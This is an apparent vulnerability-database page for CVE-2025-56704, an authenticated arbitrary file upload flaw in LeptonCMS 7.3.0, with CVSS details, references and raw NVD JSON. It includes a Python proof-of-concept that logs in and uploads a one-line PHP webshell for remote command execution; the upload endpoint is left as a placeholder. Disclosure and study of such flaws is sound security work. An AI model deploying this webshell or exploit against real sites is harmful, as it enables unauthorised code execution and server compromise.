CVE-2025-56704

Description

LeptonCMS version 7.3.0 contains an arbitrary file upload vulnerability, which is caused by the lack of proper validation for uploaded files. An authenticated attacker can exploit this vulnerability by uploading a specially crafted ZIP/PHP file to execute arbitrary code.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lepton-cms:leptoncms:7.3.0:*:*:*:*:*:*:* - VULNERABLE

LeptonCMS 7.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-56704 PoC - LeptonCMS 7.3.0 Arbitrary File Upload
# Author: Security Researcher
# Note: For authorized security testing only

import requests
import sys

TARGET_URL = "http://target-website.com/lepton/admin/login/index.php"
UPLOAD_URL = "http://target-website.com/lepton/admin/..."  # Upload endpoint
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def login(session):
    """Authenticate to LeptonCMS admin panel"""
    login_data = {
        'username': USERNAME,
        'password': PASSWORD
    }
    response = session.post(TARGET_URL, data=login_data)
    return 'login_success' in response.text or response.status_code == 200

def upload_malicious_file(session):
    """Upload malicious PHP file to achieve RCE"""
    # Create malicious PHP webshell
    php_shell = b'<?php system($_GET["cmd"]); ?>'
    
    files = {
        'file': ('shell.php', php_shell, 'application/x-php')
    }
    
    response = session.post(UPLOAD_URL, files=files)
    return response

def main():
    session = requests.Session()
    
    print("[*] Step 1: Authenticating to LeptonCMS...")
    if not login(session):
        print("[-] Authentication failed")
        sys.exit(1)
    
    print("[+] Authentication successful")
    print("[*] Step 2: Uploading malicious PHP file...")
    
    response = upload_malicious_file(session)
    
    if response.status_code == 200:
        print("[+] File uploaded successfully")
        print("[*] Step 3: Execute commands via uploaded webshell")
        shell_url = response.json().get('file_path')
        print(f"[+] Shell accessible at: {shell_url}?cmd=whoami")
    else:
        print("[-] Upload failed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56704
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56704
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56704/
[4] VulDB https://vuldb.com/cve/CVE-2025-56704
[5] http://lepton.com
[6] https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_A.pdf
[7] https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_B.pdf
[8] https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_C.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56704", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:51.373", "lastModified": "2025-12-11T20:16:08.923", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "LeptonCMS version 7.3.0 contains an arbitrary file upload vulnerability, which is caused by the lack of proper validation for uploaded files. An authenticated attacker can exploit this vulnerability by uploading a specially crafted ZIP/PHP file to execute arbitrary code."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lepton-cms:leptoncms:7.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "9BA1D316-152A-42DB-8A18-AC8392401C60"}]}]}], "references": [{"url": "http://lepton.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_A.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_B.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_C.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}